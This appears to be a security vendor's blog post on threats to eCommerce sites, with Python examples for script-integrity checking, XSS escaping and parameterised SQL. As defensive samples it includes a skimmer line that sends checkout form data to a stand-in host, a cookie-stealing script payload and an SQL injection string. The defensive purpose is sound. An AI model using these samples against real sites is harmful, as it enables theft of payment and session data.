
Online retailers face numerous challenges daily—attracting customers, managing inventory, navigating the supply chain, etc. Amid all this, it is easy to forget the eCommerce cyber security threats lurking around every corner of the internet, waiting to pounce on unsuspecting merchants and customers. A massive attack by the hacker group Keeper compromised over 570 eCommerce stores in 55 countries, leaking 184,000 credit cards and generating over $7 million from the sale of the compromised cards [1]. The breach unfolded over three years, ending in 2020. 85% of the affected websites used the Magento CMS, which fell victim to sophisticated attacks such as Magecart.
Whether you are thinking of making the leap to eCommerce or already have a thriving business, you must set up a detailed cyber security approach for all risks. Security must form the foundation of your site, not a layer thrown on top of it. To get you started, we’ve put together a list of the major security threats the eCommerce industry is facing and what you can do to mitigate them.
Why Cyber Security Is Essential for eCommerce
An eCommerce site holds a wealth of information. Customers hand over personal data, such as their names, usernames, passwords, email address, and physical address, in addition to sensitive financial data like bank account details, credit/debit card information, etc. Hackers with access to all this data can sell it online on the black market or use it to commit credit card theft, identity fraud, and similar illegal practices.
Even employees cannot escape eCommerce security threats, since they can become targets for cybercriminals. If attackers gain access to your network, they can slow it down or grind it to a halt until you pay a ransom. Your business thus has to safeguard workers and visitors, as well as keep up with industry standards. Any slip could result in a serious loss of revenue, a reputational hit, and legal repercussions. Customer trust could also take a beating, harming you in the long term.

Top eCommerce Security Threats and Solutions
Most websites share a common set of security threats, but eCommerce sites are especially at risk of attacks seeking payment information. Verizon’s 2019 Data Breach Investigations Report showed that eCommerce web application attacks rose from 5% to 64% over four years [2]. 81% of threat actors were external and 19% were internal. 81% of breaches involved web applications, privilege misuse, and miscellaneous errors. Of the data compromised, 64% was payments related, 20% was credentials related, and 16% was personal.
Keeping this in mind, here are some of the critical threats you’ll have to watch out for:
Phishing
You’ve probably heard about phishing or its variants, such as vishing, smishing, and spear phishing. It has become increasingly common as a low-cost, high-gain attack that requires minimal resources on the criminal’s part. Phishing usually involves a fraudulent email or text message that wants you to click on a link or fill in a form. The perpetrator may not know your name, so they’ll send a generic greeting like ‘Hi Dear’. The subject matter appears urgent, like an expired subscription or delayed delivery. It usually looks like it’s coming from an official source, with authentic-looking branding, or even from an internal company email address.
You must train your employees to identify phishing attacks: for instance, hovering over a link to check whether the URL is correct, and, when visiting a website through a link, checking whether the domain name is correct. Never fill in forms on sites you are unsure of.
E-skimming
In an e-skimming attack, cybercriminals insert skimming code onto eCommerce payment pages to steal credit card info and personally identifiable data by sending all the inputted data to their server or domain. British Airways faced a major e-skimming attack in 2018 when hackers stole the credit card credentials of over 350,000 customers [3]. They used Magecart to carry out the attack, copying the JavaScript payment forms on the British Airways site. They also breached the airline’s mobile app.
E-skimmers typically use phishing or brute force to break into your network. They could also exploit a vulnerability on your platform. To identify e-skimming attacks, check whether your JavaScript has been edited, whether a new domain appears that you did not register, or whether customers are complaining to you about fraudulent activity in their accounts.
To reduce the risk of an e-skimming attack, follow these tips:
· Keep an eye on web logs.
· Update your anti-virus software.
· Perform code integrity checks.
· Install updates and patches from payment vendors regularly.
· Complete your PCI DSS compliance.
· Limit network exposure by implementing network separation.
If you do get hit by an e-skimming attack, you should first and foremost identify the source of the skimming code so you can find out where the attackers are accessing data from—network, third party, etc. Change all your credentials so hackers can’t re-enter. Lastly, note down all the breach details, such as the skimming script or malicious domain. You can hand these over to the police in case of an investigation.
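The two detection signals named above, edited JavaScript and references to a domain you never registered, can be turned into a routine code integrity check. The following script is an added example, not code from the article or from any vendor it mentions: it keeps a baseline of SHA-256 hashes for the payment-page scripts, flags any script whose hash changed, was added, or went missing, and lists any host in the script text that is not on an allowlist. The script names, the allowlisted domains, and the "collector.invalid" host used in the usage example are all constructed for illustration.

```python
import hashlib
import re
from urllib.parse import urlparse

# Assumed allowlist: the only hosts checkout scripts are expected to talk to.
KNOWN_DOMAINS = {"shop.example", "cdn.example"}


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 digest used as the integrity baseline for a script."""
    return hashlib.sha256(data).hexdigest()


# Constructed baseline: the known-good checkout script as deployed.
# In practice this manifest is generated at release time and stored
# somewhere the web server cannot write to.
BASELINE = {
    "checkout.js": sha256_hex(b"function pay(){ post('/api/pay', form); }"),
}

# Crude URL matcher; good enough to surface hard-coded exfiltration hosts.
URL_RE = re.compile(r"""https?://[^\s'"()<>]+""")


def find_unknown_domains(script: str, allowlist=KNOWN_DOMAINS):
    """Return every host referenced in the script that is not allowlisted."""
    hosts = set()
    for url in URL_RE.findall(script):
        host = urlparse(url).hostname
        if host and host not in allowlist:
            hosts.add(host)
    return sorted(hosts)


def check_scripts(current: dict, baseline=BASELINE, allowlist=KNOWN_DOMAINS):
    """Compare the scripts currently served with the baseline.

    `current` maps script name -> text as fetched from the live site.
    Returns a list of (script, finding) tuples; an empty list means clean.
    """
    findings = []
    for name, content in current.items():
        digest = sha256_hex(content.encode())
        expected = baseline.get(name)
        if expected is None:
            findings.append((name, "unexpected script not in baseline"))
        elif digest != expected:
            findings.append((name, "hash mismatch: script modified"))
        for host in find_unknown_domains(content, allowlist):
            findings.append((name, f"references unknown domain {host}"))
    for name in baseline:
        if name not in current:
            findings.append((name, "baseline script missing"))
    return findings


if __name__ == "__main__":
    # Constructed sample of a tampered checkout script that also posts the
    # form to a host outside the allowlist.
    tampered = {
        "checkout.js": "function pay(){ post('/api/pay', form); "
                       "fetch('https://collector.invalid/c?d=' + btoa(JSON.stringify(form))); }"
    }
    for script, finding in check_scripts(tampered):
        print(f"{script}: {finding}")
```

Run this against the scripts actually served to a browser (fetched over HTTPS, not read from the deploy directory) so that anything injected at the CDN or by a compromised third-party tag is caught as well; the findings are what you would hand to the web-log review recommended above.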

Spoofing
Just as the name suggests, a spoofing attack involves building a replica of your website using your brand logo, home page layout, etc. Visitors may not be able to tell the difference, especially if the domain name is close to your own. They may enter all kinds of sensitive information such as credit card data, usernames, passwords, birthdays, mobile numbers, email IDs, etc. The spoofed site could even trick you into downloading malware that will infect your device directly. It’s all part of a well-oiled social engineering attack, in which the aim is to draw a person in and fool them into revealing information.
Keep an eye out for spoofed sites and immediately take action if a user reports a cloned website. To help customers distinguish your site from the fake one, ensure you have an SSL certificate and HTTPS encryption. Browsers will then display a green padlock next to your URL in the address bar.
XSS Attacks
Attackers can manipulate your site’s code in a cross-site scripting (XSS) injection attack, and you may not even know it because, in most cases, the site continues to function as usual. Cybercriminals insert their malicious script into your web application so that it is sent to customers when they interact with your site. The visitor’s browser will execute the script, treating it as legitimate. Because of this trickery, the script can get hold of session tokens, cookies, and any other data collected and stored by the browser. The script may even rewrite your site’s content and lead to account impersonation.
Because of their hidden nature, vulnerabilities that lead to XSS attacks can be tough to spot and eliminate from your web app. You will have to conduct a thorough security review of your code. Investigate any places where inputs from an HTTP request could translate into HTML content.
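The place to look during that code review is any spot where request input is concatenated into HTML. The snippet below is an added example, not code from the article: it renders a customer product review first the vulnerable way, then with the input escaped for the context it lands in. The review text and author name are constructed sample inputs, and `render_review_unsafe` / `render_review_safe` are hypothetical helper names.

```python
import html

# Constructed sample input: what a visitor typed into the review form.
# The author field tries to break out of an attribute; the text field
# tries to inject a script tag.
SAMPLE_AUTHOR = 'mallory" onmouseover="alert(1)'
SAMPLE_TEXT = "<script>alert(document.cookie)</script>"


def render_review_unsafe(author: str, text: str) -> str:
    """Vulnerable: request input is pasted straight into the HTML.

    Whatever markup the input contains becomes part of the page that the
    next visitor's browser parses and executes.
    """
    return f'<div class="review" data-author="{author}"><p>{text}</p></div>'


def render_review_safe(author: str, text: str) -> str:
    """Hardened: every untrusted value is escaped before it enters HTML.

    quote=True also turns " and ' into entities, which is what stops the
    author field from closing the data-author attribute and adding a
    handler of its own.
    """
    safe_author = html.escape(author, quote=True)
    safe_text = html.escape(text, quote=True)
    return f'<div class="review" data-author="{safe_author}"><p>{safe_text}</p></div>'


def contains_live_markup(rendered: str) -> bool:
    """Review-time check: does the rendered fragment still contain a raw
    tag or an inline event handler that came from the input?"""
    lowered = rendered.lower()
    return "<script" in lowered or ' onmouseover="' in lowered


if __name__ == "__main__":
    print("unsafe:", render_review_unsafe(SAMPLE_AUTHOR, SAMPLE_TEXT))
    print("safe:  ", render_review_safe(SAMPLE_AUTHOR, SAMPLE_TEXT))
```

Escaping is context-specific: `html.escape` is right for element text and quoted attribute values, but input placed inside a `<script>` block, a URL, or CSS needs the encoder for that context, which is why a template engine with auto-escaping is the usual fix for a whole site rather than hand-placed calls.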
SQL Injection Attacks
Structured query language (SQL) injection is another insertion-type attack, wherein malicious SQL code is injected into input fields to manipulate the backend database. This allows the hacker to view private site data that the public cannot see, such as usernames, credit card info, password lists, customer details, etc. They can also insert, update, or delete database data; execute admin operations; and issue commands to the OS.
Since user input fields are the entry point for SQL injection attacks, the key to preventing one is to watch over and vet user inputs. Deploy strict input validation so that only accepted inputs can pass through. Parameterised queries should also be used, so that the SQL statement and the input values reach the database separately: the database then treats the input purely as data and never as part of the query.
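To show the two defences side by side, here is an added example (not code from the article) using Python's standard-library `sqlite3` against an in-memory table of constructed customer rows. `lookup_unsafe` builds the query by string formatting, `lookup_safe` uses a parameterised query, and `is_plausible_email` is the strict input validation step; the function names, table layout and the sample injection string are all assumptions for the demonstration.

```python
import re
import sqlite3

# Constructed sample data: two customer rows in an in-memory database.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT)"
    )
    conn.executemany(
        "INSERT INTO customers (email, card_last4) VALUES (?, ?)",
        [("alice@example.com", "4242"), ("bob@example.com", "1111")],
    )
    return conn


# Constructed sample of input from a "look up my account" form.
INJECTION_INPUT = "' OR '1'='1"


def lookup_unsafe(conn: sqlite3.Connection, email: str):
    """Vulnerable: the input becomes part of the SQL text, so a quote in it
    ends the string literal and the rest is executed as SQL."""
    query = f"SELECT email, card_last4 FROM customers WHERE email = '{email}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, email: str):
    """Hardened: the statement is fixed and the input travels as a bound
    parameter, so the database compares it as a value, never runs it."""
    return conn.execute(
        "SELECT email, card_last4 FROM customers WHERE email = ?", (email,)
    ).fetchall()


# Strict allowlist validation applied before the query is even built.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def is_plausible_email(value: str) -> bool:
    return EMAIL_RE.fullmatch(value) is not None


def lookup_validated(conn: sqlite3.Connection, email: str):
    """Both layers together: reject malformed input, then query safely."""
    if not is_plausible_email(email):
        return []
    return lookup_safe(conn, email)


if __name__ == "__main__":
    db = build_db()
    print("unsafe:", lookup_unsafe(db, INJECTION_INPUT))   # every row leaks
    print("safe:  ", lookup_safe(db, INJECTION_INPUT))     # no row matches
    print("validated:", lookup_validated(db, "alice@example.com"))
```

Validation and parameterisation are not alternatives: the allowlist rejects junk early and keeps error messages unhelpful to an attacker, while the bound parameter is what guarantees that even input which passes validation can never change the shape of the query.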
Shield Against Security Threats with ThreatScan
eCommerce businesses today fly high or fall flat depending on the strength of their cyber security. It cannot be left up to chance, even for small and medium-sized firms. ThreatScan is a SaaS-based vulnerability management and penetration testing platform that goes deep into your system to scan for vulnerabilities, scrutinise risks, and help perform manual pentests. You’ll get an instant threat score to see how your application and network are faring in terms of security, along with an overall organisation score and risk posture. There’s even an easy-to-understand dashboard to manage vulnerabilities, view the status of your pentest, and much more.
If you’re new to this process or feel lost, our AI-based chatbot, Diana, will help you submit, download, and reapply for tests in real-time. The AI-based chatbot will help you answer any questions related to cyber security or about the product. We are also available 24/7 to support you through the pentest journey. You’ll receive all ThreatScan notifications through email, Jira, and Slack integration, allowing you to take action quickly and communicate effectively with your team on your preferred platform.
Contact us here to begin your ThreatScan journey.
References
3. https://www.imperva.com/learn/application-security/magecart/
4. https://niccs.cisa.gov/sites/default/files/documents/pdf/ncsam_eskimming_508.pdf
5. https://www.malwarebytes.com/spoofing
6. https://owasp.org/www-community/attacks/xss/
7. https://www.ptsecurity.com/ww-en/analytics/knowledge-base/how-to-prevent-sql-injection-attacks/